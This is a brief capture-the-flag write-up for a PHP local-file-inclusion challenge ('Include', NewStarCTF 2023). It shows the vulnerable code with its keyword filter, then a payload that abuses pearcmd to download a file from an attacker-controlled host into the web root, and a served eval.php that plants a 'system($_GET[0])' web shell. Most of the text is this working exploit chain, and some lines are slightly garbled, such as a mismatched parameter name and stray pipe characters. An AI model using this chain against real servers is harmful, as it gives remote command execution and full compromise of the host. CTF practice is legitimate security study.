# [NewStarCTF 2023 公开赛道] Include 🍐
<?php
error_reporting(0);
if(isset($_GET['file'])) {
$file = $_GET['file'];
if(preg_match('/flag|log|session|filter|input|data/i', $file)) {
die('hacker!');
}
include($file.".php");
# Something in phpinfo.php!
}
else {
highlight_file(__FILE__);
}
?>
paylaod:
?f=pearcmd&+install+-R+/var/www/html+http://ip:port/eval.php
eval.php:
<?php | |
echo '<?php system($_GET[0]);'; |